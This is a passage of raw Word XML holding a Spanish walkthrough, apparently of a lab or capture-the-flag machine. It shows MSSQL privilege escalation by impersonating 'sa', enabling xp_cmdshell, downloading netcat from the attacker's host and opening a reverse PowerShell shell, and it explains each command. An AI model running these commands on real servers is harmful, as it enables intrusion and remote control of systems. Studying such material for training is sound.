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inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3676650" cy="1362075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3676650" cy="136207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En el apartado de blog podemos encontrar el identificador del usuario</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3086100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22"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Ingresando a el dashboard  de administrador encontramos encontramos que podemos ejecutar codigo sql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2333625" cy="609600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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2333625" cy="6096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Asi que usamos el comando para obtener el nombre del usuario</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El comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT USER_NAME();</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una consulta SQL utilizada en Microsoft SQL Server para obtener el nombre de usuario de la sesión actual. Este comando devuelve el nombre del usuario de base de datos que está ejecutando la consulta.</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select user_name();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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7312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Luego intentamos ejecutar el comando EXECUTE xp_cmdshell 'whoami';</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El comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE xp_cmdshell 'whoami';</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Microsoft SQL Server se utiliza para ejecutar un comando del sistema operativo a través de SQL Server, específicamente utilizando el procedimiento almacenado extendido </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Este procedimiento permite ejecutar comandos de shell de Windows desde una sesión de SQL Server</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pero este nos arroja un error de permisos denegados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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731200"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Así que vamos a intentar obtener el usuario del propietario de la base de datos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yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select suser_sname(owner_sid) from sys.databases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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT suser_sname(owner_sid) FROM sys.databases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza en Microsoft SQL Server para obtener los nombres de los propietarios de las bases de datos en el servidor. Aquí está la explicación y el uso detallado de este comando.</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bfx441nxa93u" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Desglose del Comando</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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sys.databases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es una vista de catálogo en SQL Server que contiene una fila para cada base de datos del servidor. Entre las columnas disponibles en esta vista está </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">owner_sid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que es el identificador de seguridad (SID) del propietario de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="24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suser_sname(owner_sid)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es una función de SQL Server que convierte un SID en el nombre de usuario correspondiente. Al aplicar esta función a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">owner_sid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, se obtiene el nombre del propietario de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="5626100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18" name="image43.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image43.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="56261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verificar si un usuario tiene pertenencia al rol de servidor </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysadmin</w:t>
      </w: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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE AS LOGIN = 'sa'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT IS_SRVROLEMEMBER('sysadmin')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5162550" cy="4505325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23" name="image35.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5162550" cy="4505325"/>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ponemos a correr nuestro servidor python donde se va a cargar el nc64.exe que tenemos en nuestra maquina</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5086350" cy="371475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5086350" cy="371475"/>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y ponemos nuestro Netcat en escucha en el puerto 4444 donde se va hacer la conexión del </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1743075" cy="209550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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1743075" cy="20955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Ahora con esta ya podremos ejecutar el siguiente comando</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE AS LOGIN = 'sa' </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT SYSTEM_USER </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT IS_SRVROLEMEMBER('sysadmin') </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'show advanced options', 1; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'xp_cmdshell', 1; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_cmdshell 'echo IWR http://10.10.14.136:8000/nc64.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXEC xp_cmdshell '%TEMP%\nc.exe 10.10.14.136 4444 -e powershell'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE AS LOGIN = Este comando cambia el contexto de ejecución de la sesión actual para que se ejecute bajo las credenciales del inicio de sesión </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la cuenta de administrador del sistema en SQL Server.</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Fonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT SYSTEM_USER = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> devuelve el nombre del inicio de sesión del usuario actual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT IS_SRVROLEMEMBER('sysadmin'=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> verifica si el usuario actual es miembro del rol de servidor </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esperamos que este comando devuelva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ya que estamos ejecutando como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC sp_configure 'show advanced options', 1 y EXEC sp_configure 'xp_cmdshell', 1 = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Estos comandos habilitan las opciones avanzadas y luego habilitan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell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xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite ejecutar comandos del sistema operativo desde SQL Server, lo cual tiene implicaciones de seguridad muy significativas.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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_cmdshell 'echo IWR http://10.10.14.136:8000/nc64.exe -OutFile %TEMP%\nc.exe = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El primer comando descarga un archivo desde una URL específica usando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IWR) de PowerShell y lo guarda en el directorio temporal (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
